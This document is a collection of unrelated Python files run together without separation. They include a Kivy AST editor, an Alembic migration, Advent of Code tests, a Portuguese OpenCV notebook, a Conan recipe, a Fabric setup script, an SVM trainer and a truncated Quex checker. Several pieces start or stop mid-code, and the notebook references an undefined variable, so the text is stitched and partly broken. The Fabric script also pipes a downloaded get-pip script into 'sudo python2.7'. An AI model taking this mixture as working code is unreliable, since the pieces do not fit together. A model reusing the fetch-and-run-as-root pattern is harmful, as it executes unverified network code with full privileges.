st.bind(text=self.ast.setter('source')) self.ast.bind(on_generate=lambda _, tree: buildtreeview(tree, root.ids.treeview)) self.ast.bind(on_generate=lambda *_: setattr(self, 'output', self.ast.compile())) self.ast.bind(on_compile=lambda _, output: setattr(root.ids.output_text, 'text', output)) self.ast.bind(on_compile=self.save_outfile) self.ast.bind(on_tree_changed=self.refresh) Clock.schedule_once(self.load) root.ids.treeview.bind(selected_node=self.update_selection) root.ids.btn_movedown.bind(on_press=lambda *_: self.move_node(1)) root.ids.btn_moveup.bind(on_press=lambda *_: self.move_node(-1)) root.ids.btn_addprop.bind(on_press=self.add_property) root.ids.btn_removenode.bind(on_press=self.remove_node) return root def refresh(self, *_): self.selected = None buildtreeview(self.ast.tree, self.root.ids.treeview) self.ast.compile() def move_node(self, dir): if self.selected: tree = self.selected.tree_node if tree.parent: parent = tree.parent count = parent.getChildCount() if count > 1: index = tree.childIndex destindex = index + dir if destindex < 0: destindex = count - 1 elif destindex >= count: destindex = 0 self.ast.shift_node(tree, destindex) def add_property(self, *_): if self.selected: try: key = 'prop' value = "'val'" self.ast.widget_add_property(self.selected.tree_node, key, value) except ValueError, e: print str(e) def remove_node(self, *_): if self.selected: self.ast.remove_node(self.selected.tree_node) def load(self, _dt): self.ast.load(filename=self.ast_file) def save_outfile(self, ast, output): ast.unbind(on_compile=self.save_outfile) with open(self.ast_file + '.out', 'w') as f: f.write(output) def update_scroll(self, sv, ti): srow, scol = ti.get_cursor_from_index(ti.selection_from) ti.cursor = srow, scol spos = (ti.cursor_pos[0], ti.cursor_pos[1] - sv.height) x, y = 
sv.convert_distance_to_scroll(*spos) sv.scroll_y = min(1., max(0., y)) sv.update_from_scroll() def update_selection(self, _, selection): if selection: assert isinstance(selection, AstNode) self.selected = selection node = selection.tree_node textrange = node.get_textrange() if textrange: st = self.root.ids.source_text st.select_text(*textrange) self.update_scroll(self.root.ids.sv_source_text, st) try: ot = self.root.ids.output_text ot.select_text(node.output_start, node.output_stop) self.update_scroll(self.root.ids.sv_output_text, ot) except Exception: pass if __name__ == '__main__': AstApp(sys.argv[1]).run() dataactcore/migrations/versions/2592f3bdae72_adding_cascade_to_foreign_keys_in_.py """Adding cascade to foreign keys in RuleSetting Revision ID: 2592f3bdae72 Revises: 42e11ab5cea3 Create Date: 2020-02-11 17:02:00.651727 """ # revision identifiers, used by Alembic. revision = '' down_revision = '42e11ab5cea3' branch_labels = None depends_on = None from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import postgresql def upgrade(engine_name): globals()["upgrade_%s" % engine_name]() def downgrade(engine_name): globals()["downgrade_%s" % engine_name]() def upgrade_data_broker(): # ### commands auto generated by Alembic - please adjust! ### op.drop_constraint('fk_rule', 'rule_settings', type_='foreignkey') op.drop_constraint('fk_impact', 'rule_settings', type_='foreignkey') op.create_foreign_key('fk_impact', 'rule_settings', 'rule_impact', ['impact_id'], ['rule_impact_id'], ondelete='CASCADE') op.create_foreign_key('fk_rule', 'rule_settings', 'rule_sql', ['rule_id'], ['rule_sql_id'], ondelete='CASCADE') # ### end Alembic commands ### def downgrade_data_broker(): # ### commands auto generated by Alembic - please adjust! ### op.drop_constraint('fk_rule', 'rule_settings', type_='foreignkey') op.drop_constraint('fk_impact', 'rule_settings', type_='foreignkey') op.create_foreign_key('fk_impact', 'rule_settings', 'rule_impact', ['impact_id'], ['rule_impact_id']) op.create_foreign_key('fk_rule', 'rule_settings', 'rule_sql', ['rule_id'], ['rule_sql_id']) # ### end Alembic commands ### NelliaS/advent_of_code from pytest import mark from day_9 import ( parse, determine_adjacent_positions, main, determine_lowest_points, is_lowest, count_basin, ) test_area = [ [2, 1, 9, 9, 9, 4, 3, 2, 1, 0], [3, 9, 8, 7, 8, 9, 4, 9, 2, 1], [9, 8, 5, 6, 7, 8, 9, 8, 9, 2], [8, 7, 6, 7, 8, 9, 6, 7, 8, 9], [9, 8, 9, 9, 9, 6, 5, 6, 7, 8], ] def test_parse() -> None: assert parse("day_9_test.txt") == test_area @mark.parametrize( ["position_of_number", "height", "width", "adjacent_positions"], [ ([4, 9], 5, 10, [[3, 9], [4, 8]]), ([0, 3], 5, 10, [[1, 3], [0, 4], [0, 2]]), ], ) def test_determine_adjacent_positions( position_of_number, height, width, adjacent_positions ) -> None: assert ( determine_adjacent_positions(position_of_number, height, width) == adjacent_positions ) @mark.parametrize( ["number", "area_width", "area_height", "position_of_number", "result"], [ (5, 5, 10, [2, 2], True), (2, 5, 10, [0, 0], False), (9, 5, 10, [1, 1], False), (5, 5, 10, [4, 6], True), ], ) def test_is_lowest(number, area_width, area_height, position_of_number, result) -> None: assert ( is_lowest(number, test_area, area_width, area_height, position_of_number) == result ) def test_determine_lowest_points() -> None: assert determine_lowest_points(test_area) == ( [1, 0, 5, 5], [[0, 1], [0, 9], [2, 2], [4, 6]], ) @mark.parametrize( ["position_of_number", "area_height", "area_width", "result"], [ ([0, 1], 5, 10, 3), ([4, 6], 
5, 10, 9), ], ) def test_count_basin(position_of_number, area_height, area_width, result) -> None: assert count_basin(test_area, position_of_number, area_height, area_width) == result def test_main() -> None: assert main("day_9_test.txt") == (15, 1134) hawkhai/pyinstaller """ pkg.relimport """ class Error(Exception): """Base class for exceptions in this module.""" pass class MovementError(Error): """Exception for invalid movement on the game board""" pass # coding: utf-8 # # Introdução # As transformações aplicadas em imagens cujo os objetivos são mudanças nas características espaciais chamam-se: transformações geométricas. Tais mudanças baseiam-se na multiplicação ponto a ponto das coordenadas da imagem por uma matriz de transformação. É importante ressaltar queas mudanças detém-se ao espaço vetorial da imagem ($x,y$), as informações de intensidade luminosa contida nos pixels não são alteradas. # # Exemplos destas transformações são: translação ($T1$), rotação ($T2$) e mudança de escala ($T3$). Representadas pelas seguintes matrizes de transformação: # $$ T1 = \left[ \begin{array}{ccc} # 1 & 0 & tx \\ # 0 & 1 & ty \end{array} \right]\ $$ # $$ T2 = \left[ \begin{array}{ccc} # cos\theta & -sin\theta \\ # sin\theta & cos\theta \end{array} \right]\ $$ # $$ T3 = \left[ \begin{array}{ccc} # cx & 0 & 0 \\ # 0 & cy & 0 \\ # 0 & 0 & 0 \end{array} \right]\ $$ # # Discussões sobre os métodos: # As transformações geométricas são operação elementares, porém úteis quando há necessário realizar mudanças no espaço de entrada a imagem, modificando a forma atual da imagem, seja por uma translação, rotação ou mudança de escala, por exemplo. # In[18]: import cv2 import numpy as np import matplotlib.pyplot as plt # - Abrir imagem: # In[21]: img = np.array(cv2.imread('apple-18.png', cv2.IMREAD_GRAYSCALE)) rows, cols = img.shape plt.figure(1) plt.imshow(img, 'gray') plt.axis('OFF') plt.title('Imagem Original') plt.show() # ## Translação # - Criar matriz de transformação: # In[30]: tx = 20 ty = 20 Mt = np.float32([[1, 0, tx], [0, 1, ty]]) imgT1 = cv2.warpAffine(img, Mt, (cols, rows)) tx = 20*2 ty = 20*2 Mt = np.float32([[1, 0, tx], [0, 1, ty]]) imgT2 = cv2.warpAffine(img, Mt, (cols, rows)) tx = 20*3 ty = 20*3 Mt = np.float32([[1, 0, tx], [0, 1, ty]]) imgT3 = cv2.warpAffine(img, Mt, (cols, rows)) # In[34]: plt.figure(2, figsize=(10,8)) plt.subplot(131) plt.imshow(imgT1, 'gray') plt.axis('OFF') plt.subplot(132) plt.imshow(imgT2, 'gray') plt.axis('OFF') plt.subplot(133) plt.imshow(imgT3, 'gray') plt.axis('OFF') plt.show() # A operação de translação move a imagem, desde um ponto de escolha (neste caso a origem) até um ponto de destino. É uma operação útil quando há interesse em remover parte da imagem e tornar útil apenas o resultado da translação. # # O método preserva o tamanho original da imagem e por tal motivo a operação em imagens binárias preserva o objeto e constitui um novo fundo. 
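# A minimal illustrative sketch of how these affine transforms compose: a translation and a rotation can be merged into a single 2x3 matrix via their 3x3 homogeneous forms and applied with one call to cv2.warpAffine. It assumes the same 'apple-18.png' image used above; the names img_demo, Mt3, Mr3 and Mcombined are illustrative only.

# In[ ]:

import cv2
import numpy as np

img_demo = np.array(cv2.imread('apple-18.png', cv2.IMREAD_GRAYSCALE))
r, c = img_demo.shape

# homogeneous (3x3) forms of a translation by (20, 20) and a 45-degree rotation about the centre
Mt3 = np.vstack([np.float32([[1, 0, 20], [0, 1, 20]]), [0, 0, 1]])
Mr3 = np.vstack([cv2.getRotationMatrix2D((c / 2, r / 2), 45, 1), [0, 0, 1]])

# compose (rotation applied first, then translation) and drop back to the 2x3 form warpAffine expects
Mcombined = (Mt3 @ Mr3)[:2, :]
imgCombined = cv2.warpAffine(img_demo, Mcombined, (c, r))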
# ## Rotação # - Define centro de rotação, angulo de rotação e cria matriz de transformação # In[27]: cr = (cols/2, rows/2) ar = 90 Mr = cv2.getRotationMatrix2D(cr,ar,1) imgR1 = cv2.warpAffine(img, Mr, (cols,rows)) ar = -90 Mr = cv2.getRotationMatrix2D(cr,ar,1) imgR2 = cv2.warpAffine(img, Mr, (cols,rows)) ar = 35+10 Mr = cv2.getRotationMatrix2D(cr,ar,1) imgR3 = cv2.warpAffine(img, Mr, (cols,rows)) # In[29]: plt.figure(3, figsize=(10,8)) plt.subplot(131) plt.imshow(imgR1, 'gray') plt.axis('OFF') plt.subplot(132) plt.imshow(imgR2, 'gray') plt.axis('OFF') plt.subplot(133) plt.imshow(imgR3, 'gray') plt.axis('OFF') plt.show() # Assim como a translação a rotação move a imagem em torno de um ponto de escolha. A rotação pode utilizada livremente, ser no sentido horário ou antihorário e com a inclinação desejada. O tamanho e o fundo original da imagem são preservados e há movimento apenas do objeto. # ## Escala # In[60]: colNewsize = 100 rowNewsize = 100 imgE1 = cv2.resize(img, (colNewsize,rowNewsize)) colNewsize = 300 rowNewsize = 300 imgE2 = cv2.resize(img, (colNewsize,rowNewsize)) # In[61]: plt.figure(3+1, figsize=(10,8)) plt.subplot(131) plt.imshow(img, 'gray') plt.title('Imagem original %dx%d' % (img.shape[0], img.shape[1])) plt.axis('OFF') plt.subplot(132) plt.imshow(imgE1, 'gray') plt.title('Imagem reduzida %dx%d' % (imgE1.shape[0], imgE1.shape[1])) plt.axis('OFF') plt.subplot(133) plt.imshow(imgE2, 'gray') plt.title('Imagem aumentada %dx%d' % (imgE2.shape[0], imgE2.shape[1])) plt.axis('OFF') plt.show() # O método de mudança de escala trabalha de forma diferente das duas operações geométricas anteriores: O objeto e fundo são mantidos estáticos, enquanto que o tamanho da imagem é alterado. # # A baixa de qualidade na imagem reduzida dar-se perda de informações durante a redução de tamanho, que é notável ao visualizar ao a imagem representada do mesmo tamanho da original. Na imagem aumentada, também há perda de qualidade, porém menos notáveis ao representa-la do tamanho da original. # # Contudo, ao representar comparando a visualização da imagem aumentada e da imagem original, para o mesmo tamanho houve uma ligeira perda de qualidade. Nota-se que a imagem aumentada sofre menos os efeitos de baixa qualidade, por tender a preservar as informações originais. # In[68]: plt.figure(5, figsize=(7,7)) plt.imshow(imgE5, 'gray') plt.title('Imagem %dx%d' % (imgE2.shape[0], imgE2.shape[1])) plt.axis('OFF') plt.show() plt.figure(6, figsize=(7,7)) plt.imshow(img, 'gray') plt.title('Imagem %dx%d' % (img.shape[0], img.shape[1])) plt.axis('OFF') plt.show() # # Conclusões: # As operações geométricas de translação, rotação e mudança de escala sou elementares, porém podem ser úteis de acordo com a necessidade. Deve-se levar em conta as característica inerentes ao métodos, com o intuito de retirar maiores resultados destas opeações. vladimirshkoda/redis-bindings import pytest import redis REDIS_TEST_KEY_NAME = 'redis_key_name' VAL_1 = 'VAL_1' VAL_2 = 'VAL_2' VAL_3 = 'VAL_3' @pytest.fixture() def r(): """Redis client.""" client = redis.Redis(host='localhost', port=6379, db=9) client.flushdb() yield client client.flushdb() client.connection_pool.disconnect() tdiprima/code # decisionmaker.py # FB - 201010155 # Choose the best item from N options. # Each item can have M constraints (non-zero). # All constraints assumed to have equal importance (weight). 
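# Scoring scheme: each item's value starts at 1, is divided by every "lower is better"
# constraint and multiplied by every "higher is better" one; the item with the largest
# product is chosen.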
import sys def makeDecision(constraintsTable, constraintTypes): # calculate item values itemValues = [] for i in range(n): itemValues.append(float(1)) for j in range(m): if constraintTypes[j] == 0: # min value is better itemValues[i] /= constraintsTable[i][j] else: # max value is better itemValues[i] *= constraintsTable[i][j] # choose the best item maxIndex = 0 maxValue = itemValues[0] for i in range(n): if itemValues[i] > maxValue: maxValue = itemValues[i] maxIndex = i return itemNames[maxIndex] # MAIN n = int(raw_input('Number of items: ')) if n < 2: sys.exit() m = int(raw_input('Number of constraints for each item: ')) if m < 2: sys.exit() constraintNames = [] constraintTypes = [] # min or max is better for j in range(m): constraintName = raw_input('Constraint ' + str(j + 1) + ' name: ') constraintNames.append(constraintName) constraintType = int(raw_input('Lower(0) or Higher(1) is better: ')) if constraintType < 0 or constraintType > 1: sys.exit() constraintTypes.append(constraintType) itemNames = [] constraintsTable = [] for i in range(n): itemName = raw_input('Item ' + str(i + 1) + ' name: ') itemNames.append(itemName) constraints = [] for j in range(m): constraint = float(raw_input(constraintNames[j] + ': ')) if constraint == 0.0: print 'Constraint value cannot be 0!' sys.exit() constraints.append(constraint) constraintsTable.append(constraints) print 'Best item decided: ' + makeDecision(constraintsTable, constraintTypes) from conans import ConanFile, CMake, tools class ArrowConan(ConanFile): name = "arrow" version = "0.15.1" license = "Apache-2.0" url = "https://arrow.apache.org/" description = "Apache arrow" topics = ("apache", "arrow") settings = "os", "compiler", "build_type", "arch" options = {"shared": [True, False]} default_options = "shared=False" generators = "cmake" requires="boost/1.71.0@conan/stable" def source(self): if self.settings.os == "Linux": self.run("sudo apt update && sudo apt install -y flex bison") self.run("git clone https://github.com/apache/arrow.git") self.run("cd arrow && git checkout apache-arrow-" + ArrowConan.version) tools.replace_in_file("arrow/cpp/CMakeLists.txt", 'project(arrow VERSION "${ARROW_BASE_VERSION}")', '''project(arrow VERSION "${ARROW_BASE_VERSION}") include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake) conan_basic_setup()''') tools.replace_in_file("arrow/cpp/cmake_modules/SetupCxxFlags.cmake", 'set(CXX_COMMON_FLAGS "${CXX_COMMON_FLAGS} -Wall -Wextra -Wdocumentation', 'set(CXX_COMMON_FLAGS "${CXX_COMMON_FLAGS} -Wall -Wextra') def configure_cmake(self): generator = "Ninja" if self.settings.os == "Windows" else None cmake = CMake(self, generator=generator) cmake.vebose = True cmake.definitions["ARROW_JEMALLOC"]="OFF" cmake.definitions["ARROW_BUILD_STATIC"]="ON" if self.settings.os == "Linux": cmake.definitions["ARROW_PARQUET"]="ON" cmake.definitions["ARROW_BUILD_SHARED"]="OFF" cmake.definitions["ARROW_BUILD_TESTS"]="OFF" cmake.definitions["ARROW_BOOST_USE_SHARED"]="OFF" cmake.definitions["ARROW_COMPUTE"]="OFF" cmake.definitions["ARROW_IPC"]="OFF" cmake.definitions["ARROW_HDFS"]="OFF" cmake.definitions["ARROW_BUILD_UTILITIES"]="OFF" cmake.definitions["ARROW_WITH_BROTLI"]="OFF" cmake.definitions["ARROW_WITH_LZ4"]="OFF" cmake.definitions["ARROW_WITH_SNAPPY"]="OFF" cmake.definitions["ARROW_WITH_ZLIB"]="OFF" cmake.definitions["ARROW_WITH_ZSTD"]="OFF" cmake.definitions["ARROW_USE_GLOG"]="OFF" if self.settings.os == "Windows": cmake.definitions["CMAKE_BUILD_TYPE"]=str(self.settings.build_type) cmake.configure(source_folder="arrow/cpp") return cmake 
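# build() and package() below both call configure_cmake() and reuse the returned CMake helper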
def build(self): self.configure_cmake().build() def package(self): self.configure_cmake().install() def package_info(self): if self.settings.os == "Windows": self.cpp_info.libs = ["arrow_static"] else: self.cpp_info.libs = ["arrow"] from fabric.api import * from fabric.context_managers import * from fabric.contrib import * from fabric.operations import * from fabric.contrib.files import * import os, datetime, time, sys, shutil, errno def install_packages(): sudo("aptitude update") sudo("aptitude -y install python-dev git nodejs npm") sudo("npm install -g bower") sudo("ln -s /usr/bin/nodejs /usr/bin/node") run("curl --silent --show-error --retry 5 https://bootstrap.pypa.io/get-pip.py | sudo python2.7") sudo("pip install virtualenv") def create_virtualenv(): # Create virtual environment with cd("/home/vagrant/"): run("virtualenv cascadedemo") # Download the Django-Cascade examples from GitHub run("git clone -b 0.4.0 https://github.com/jrief/djangocms-cascade.git") # Place custom "manage.py" file into the /home/vagrant/djangocms-cascade/example/ directory put(os.getcwd() + '/manage.py', '/home/vagrant/djangocms-cascade/examples/') put(os.getcwd() + '/requirements.txt', '/home/vagrant/djangocms-cascade/examples/bs3demo/') with cd("/home/vagrant/djangocms-cascade/"): # Install bootstrap into the /home/vagrant/djangocms-cascade/bower_components/ directory run("source /home/vagrant/cascadedemo/bin/activate && bower install bootstrap --config.interactive=false") with cd("/home/vagrant/djangocms-cascade/examples"): # Install depending Python applications run("source /home/vagrant/cascadedemo/bin/activate && pip install -r bs3demo/requirements.txt") # Djangcms-Cascade 0.4.0 is not yet available in the Python Package Index and therefore it's installed directly from GitHub run("source /home/vagrant/cascadedemo/bin/activate && pip install git+https://github.com/jrief/djangocms-cascade.git@0.4.0") run("source /home/vagrant/cascadedemo/bin/activate && python manage.py syncdb") def main(): start_time = time.time() install_packages() create_virtualenv() print "This programme executed in %s seconds." % (time.time() - start_time) wantsomechocolate/WantsomeBeanstalk # Internationalization Settings: # Do not "force" a lang anymore: T.current_languages=['en', 'en-en', 'en-us'] # If I see you pass URL?lang=es-mx, then set the preferences in the session # Helper function to tell us what language we're using: def get_lang(): return session.lang_use or '' # English is the default allowed_languages = ['es-mx', 'de-de'] # TODO: Grab this from the DB if request.vars.lang and request.vars.lang in allowed_languages: session.lang_use = request.vars.lang else: if request.vars.has_key('lang') and request.vars.get('lang', '') == '' and session.has_key('lang_use'): del session['lang_use'] if session.lang_use: T.force(session.lang_use) ##################################################################################### # MIT License # # # # Copyright (C) 2019 # # # # This file is part of Yet-Another-AlphaZero. 
# # # # Permission is hereby granted, free of charge, to any person obtaining a copy # # of this software and associated documentation files (the "Software"), to deal # # in the Software without restriction, including without limitation the rights # # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # # copies of the Software, and to permit persons to whom the Software is # # furnished to do so, subject to the following conditions: # # # # The above copyright notice and this permission notice shall be included in all # # copies or substantial portions of the Software. # # # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # # SOFTWARE. # ##################################################################################### import math def calculate_elo(rating1, rating2, result, k_factor=40): expectation = (1.0 / (1.0 + pow(10, ((rating1 - rating2) / 400)))) return round(rating1 + k_factor * (result - expectation), 2) def update_elo_score(white_elo, black_elo, winner): if winner == 'white': new_white_elo = calculate_elo(white_elo, black_elo, 1) new_black_elo = calculate_elo(black_elo, white_elo, 0) elif winner == 'black': new_white_elo = calculate_elo(white_elo, black_elo, 0) new_black_elo = calculate_elo(black_elo, white_elo, 1) else: new_white_elo = calculate_elo(white_elo, black_elo, 0.5) new_black_elo = calculate_elo(black_elo, white_elo, 0.5) return new_white_elo, new_black_elo rch/edge2ai-workshopsetup/terraform/resources/labs/utils/efm.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- import re from . import * _AGENT_MANIFESTS = None def _get_api_url(): return '%s://%s:10088/efm/api' % ('http', get_hostname(),) def _api_request(method, endpoint, expected_code=requests.codes.ok, **kwargs): url = _get_api_url() + endpoint return api_request(method, url, expected_code, **kwargs) def _api_get(endpoint, expected_code=requests.codes.ok, **kwargs): return _api_request('GET', endpoint, expected_code, **kwargs) def _api_post(endpoint, expected_code=requests.codes.ok, **kwargs): return _api_request('POST', endpoint, expected_code, **kwargs) def _api_delete(endpoint, expected_code=requests.codes.ok, **kwargs): return _api_request('DELETE', endpoint, expected_code, **kwargs) def _get_client_id(): resp = _api_get('/designer/client-id') return resp.text def _get_agent_manifests(): global _AGENT_MANIFESTS if not _AGENT_MANIFESTS: resp = _api_get('/agent-manifests') _AGENT_MANIFESTS = resp.json() return _AGENT_MANIFESTS def get_flow(agent_class): resp = _api_get('/designer/flows') json = resp.json() assert ('elements' in json) assert (len(json['elements']) == 1) flow = json['elements'][0] return flow['identifier'], flow['rootProcessGroupIdentifier'] def _get_processor_bundle(processor_type): for manifest in _get_agent_manifests(): for bundle in manifest['bundles']: for processor in bundle['componentManifest']['processors']: if processor['type'] == processor_type: return { 'group': processor['group'], 'artifact': processor['artifact'], 'version': processor['version'], } raise RuntimeError('Processor type %s not found in agent manifest.' 
% (processor_type,)) def create_processor(flow_id, pg_id, name, processor_type, position, properties, auto_terminate=None): endpoint = '/designer/flows/{flowId}/process-groups/{pgId}/processors'.format(flowId=flow_id, pgId=pg_id) body = { 'revision': { 'clientId': _get_client_id(), 'version': 0 }, 'componentConfiguration': { 'name': name, 'type': processor_type, 'bundle': _get_processor_bundle(processor_type), 'position': { 'x': position[0], 'y': position[1] }, 'properties': properties, 'autoTerminatedRelationships': auto_terminate, } } resp = _api_post(endpoint, requests.codes.created, headers={'Content-Type': 'application/json'}, json=body) return resp.json()['componentConfiguration']['identifier'] def create_remote_processor_group(flow_id, pg_id, name, rpg_url, transport_protocol, position): endpoint = '/designer/flows/{flowId}/process-groups/{pgId}/remote-process-groups'.format(flowId=flow_id, pgId=pg_id) body = { 'revision': { 'clientId': _get_client_id(), 'version': 0 }, 'componentConfiguration': { 'name': name, 'position': { 'x': position[0], 'y': position[1] }, 'transportProtocol': transport_protocol, 'targetUri': rpg_url, 'targetUris': rpg_url, } } resp = _api_post(endpoint, requests.codes.created, headers={'Content-Type': 'application/json'}, json=body) return resp.json()['componentConfiguration']['identifier'] def _get_all_by_type(flow_id, obj_type): endpoint = '/designer/flows/{flowId}'.format(flowId=flow_id) resp = _api_get(endpoint, headers={'Content-Type': 'application/json'}) obj_type_alt = re.sub(r'[A-Z]', lambda x: '-' + x.group(0).lower(), obj_type) for obj in resp.json()['flowContent'][obj_type]: endpoint = '/designer/flows/{flowId}/{objType}/{objId}'.format(flowId=flow_id, objType=obj_type_alt, objId=obj['identifier']) resp = _api_get(endpoint, headers={'Content-Type': 'application/json'}) yield resp.json() def delete_by_type(flow_id, obj, obj_type): obj_id = obj['componentConfiguration']['identifier'] version = obj['revision']['version'] client_id = _get_client_id() obj_type_alt = re.sub(r'[A-Z]', lambda x: '-' + x.group(0).lower(), obj_type) endpoint = '/designer/flows/{flowId}/{objType}/{objId}?version={version}&clientId={clientId}'.format( flowId=flow_id, objType=obj_type_alt, objId=obj_id, version=version, clientId=client_id) _api_delete(endpoint, headers={'Content-Type': 'application/json'}) LOG.debug('Object of type %s (%s) deleted.', obj_type, obj_id) def delete_all(flow_id): for obj_type in ['connections', 'remoteProcessGroups', 'processors', 'inputPorts', 'outputPorts']: for conn in _get_all_by_type(flow_id, obj_type): delete_by_type(flow_id, conn, obj_type) def create_connection(flow_id, pg_id, source_id, source_type, destination_id, destination_type, relationships, source_port=None, destination_port=None, name=None, flow_file_expiration=None): def _get_endpoint(endpoint_id, endpoint_type, endpoint_port): if endpoint_type == 'PROCESSOR': return {'id': endpoint_id, 'type': 'PROCESSOR'} elif endpoint_type == 'REMOTE_INPUT_PORT': return {'groupId': endpoint_id, 'type': 'REMOTE_INPUT_PORT', 'id': endpoint_port} else: raise RuntimeError('Endpoint type %s is not supported' % (endpoint_type,)) endpoint = '/designer/flows/{flowId}/process-groups/{pgId}/connections'.format(flowId=flow_id, pgId=pg_id) body = { 'revision': { 'clientId': _get_client_id(), 'version': 0 }, 'componentConfiguration': { 'source': _get_endpoint(source_id, source_type, source_port), 'destination': _get_endpoint(destination_id, destination_type, destination_port), 'selectedRelationships': 
relationships, 'name': name, 'flowFileExpiration': flow_file_expiration, 'backPressureObjectThreshold': None, 'backPressureDataSizeThreshold': None, } } resp = _api_post(endpoint, requests.codes.created, headers={'Content-Type': 'application/json'}, json=body) return resp.json() def publish_flow(flow_id, comments): endpoint = '/designer/flows/{flowId}/publish'.format(flowId=flow_id) body = { 'comments': comments, } _api_post(endpoint, headers={'Content-Type': 'application/json'}, json=body) 0 import random from kernels import Kernel, calc_kernel, calculate_kernels class SVMModel(object): def __init__(self, n, c, xs, ys, kernel: Kernel, param): self.alphas = [0] * n self.b = 0 self.c = c self.xs = xs self.ks = calculate_kernels(xs, kernel, param) self.ys = ys self.kernel = kernel self.param = param def predict(self, x): assert (len(self.xs[0]) == len(x)) assert (len(self.xs) == len(self.alphas)) res = 0 for alpha, x_i, y_i in zip(self.alphas, self.xs, self.ys): res += alpha * y_i * calc_kernel(x_i, x, self.kernel, self.param) res += self.b if res > 0: return 1 else: return -1 def f(model: SVMModel, ks, ys, i: int): n = len(ys) f_val = 0 for j in range(n): f_val += model.alphas[j] * ks[i][j] * ys[j] f_val += model.b return f_val def L_and_H(model: SVMModel, ys, i: int, j: int): if ys[i] != ys[j]: return max(0, model.alphas[j] - model.alphas[i]), min(model.c, model.c + model.alphas[j] - model.alphas[i]) else: return max(0, model.alphas[j] + model.alphas[i] - model.c), min(model.c, model.alphas[j] + model.alphas[i]) def update_alpha(alpha_j, e_i, e_j, y_j: int, nu: float, ll: float, h: float): new_alpha = alpha_j - y_j * (e_i - e_j) / nu return put_alpha_in_range(new_alpha, ll, h) def put_alpha_in_range(alpha_j, ll, h): if alpha_j > h: return h if h >= alpha_j >= ll: return alpha_j else: return ll def simplified_SMO(xs, ys, c, kernel, param): eps = 1e-6 tolerance = 1e-6 n = len(ys) max_passes = 55000 passes = 0 cur_model = SVMModel(n, c, xs, ys, kernel, param) # Check all sizes assert (len(cur_model.ks) == len(ys)) assert (len(xs) == len(ys)) while passes < max_passes: others = list(range(n)) random.shuffle(others) for i in range(n): passes += 1 if passes > max_passes: break e_i = f(cur_model, cur_model.ks, ys, i) - ys[i] if (ys[i] * e_i < -tolerance and cur_model.alphas[i] < cur_model.c) or ( ys[i] * e_i > tolerance and cur_model.alphas[i] > 0): j = others[i] if j == i: continue prev_alpha_i = cur_model.alphas[i] prev_alpha_j = cur_model.alphas[j] e_j = f(cur_model, cur_model.ks, ys, j) - ys[j] ll, h = L_and_H(cur_model, ys, i, j) if ll == h: continue nu = 2 * cur_model.ks[i][j] - cur_model.ks[i][i] - cur_model.ks[j][j] if nu >= 0 or abs(nu) < 1e-7: continue try: new_alpha_j = update_alpha(prev_alpha_j, e_i, e_j, ys[j], nu, ll, h) except ZeroDivisionError: continue cur_model.alphas[j] = new_alpha_j if abs(new_alpha_j - prev_alpha_j) < eps: continue new_alpha_i = prev_alpha_i + ys[i] * ys[j] * (prev_alpha_j - new_alpha_j) cur_model.alphas[i] = new_alpha_i b1 = cur_model.b - e_i - ys[i] * (new_alpha_i - prev_alpha_i) * cur_model.ks[i][i] - ys[j] * ( new_alpha_j - prev_alpha_j) * cur_model.ks[i][j] b2 = cur_model.b - e_j - ys[i] * (new_alpha_i - prev_alpha_i) * cur_model.ks[i][j] - ys[j] * ( new_alpha_j - prev_alpha_j) * cur_model.ks[j][j] cur_model.b = (b1 + b2) / 2 if 0 < new_alpha_i < cur_model.c: cur_model.b = b1 if 0 < new_alpha_j < cur_model.c: cur_model.b = b2 return cur_model class ReportGenerator(object): u""" Top-level class that needs to be subclassed to provide a report generator. 
""" filename_template = 'report-%s-to-%s.csv' mimetype = 'text/csv' code = '' description = '' def __init__(self, **kwargs): if 'start_date' in kwargs and 'end_date' in kwargs: self.start_date = kwargs['start_date'] self.end_date = kwargs['end_date'] def generate(self, response): pass def filename(self): u""" Returns the filename for this report """ return self.filename_template % (self.start_date, self.end_date) def is_available_to(self, user): u""" Checks whether this report is available to this user """ return user.is_staff# Project Quex (http://quex.sourceforge.net); License: MIT; # (C) 2005-2020 ; #_______________________________________________________________________________ from quex.input.files.specifier.mode import Mode_Prep, ModeParsed from quex.input.setup import NotificationDB import quex.engine.state_machine.check.superset as superset_check import quex.engine.state_machine.algebra.is_disjoint as is_disjoint import quex.engine.state_machine.check.outrun as outrun_checker import quex.engine.misc.error as error from quex.engine.misc.tools import typed import quex.blackboard as blackboard from quex.blackboard import setup as Setup import quex.token_db as token_db from quex.constants import E_IncidenceIDs @typed(ModePrepList=[Mode_Prep]) def do(ModePrepList): """Consistency check of mode database -- Are there applicable modes? -- Start mode: -- specified (more than one applicable mode req. explicit specification)? -- is defined as mode? -- start mode is not inheritable only? -- Entry/Exit transitions are allows? """ assert not Setup.token_class_only_f assert ModePrepList mode_name_list = sorted([m.name for m in ModePrepList]) # (*) If a conversion or a codec engine is specified, then the # 'on_bad_lexatom' handler must be specified in every mode. if Setup.buffer_encoding.bad_lexatom_possible(): _check_on_bad_lexatom_handler_implemented(ModePrepList) # (*) on_n_dedent for mode in ModePrepList: _check_token_repetition_enabled(mode, token_db) # (*) Entry/Exit Transitions for mode in ModePrepList: if not mode.implemented_f(): continue __entry_transitions(mode, ModePrepList, mode_name_list) __exit_transitions(mode, ModePrepList, mode_name_list) for mode in ModePrepList: # (*) [Optional] Warnings on Outrun if Setup.warning_on_outrun_f: _check_low_priority_outruns_high_priority_pattern(mode) # (*) Special Patterns shall not match on same lexemes if NotificationDB.error_on_special_pattern_same not in Setup.suppressed_notification_list: _check_match_same(mode, NotificationDB.error_on_special_pattern_same) # (*) Special Patterns (skip, indentation, etc.) # shall not be outrun by another pattern. if NotificationDB.error_on_special_pattern_outrun not in Setup.suppressed_notification_list: 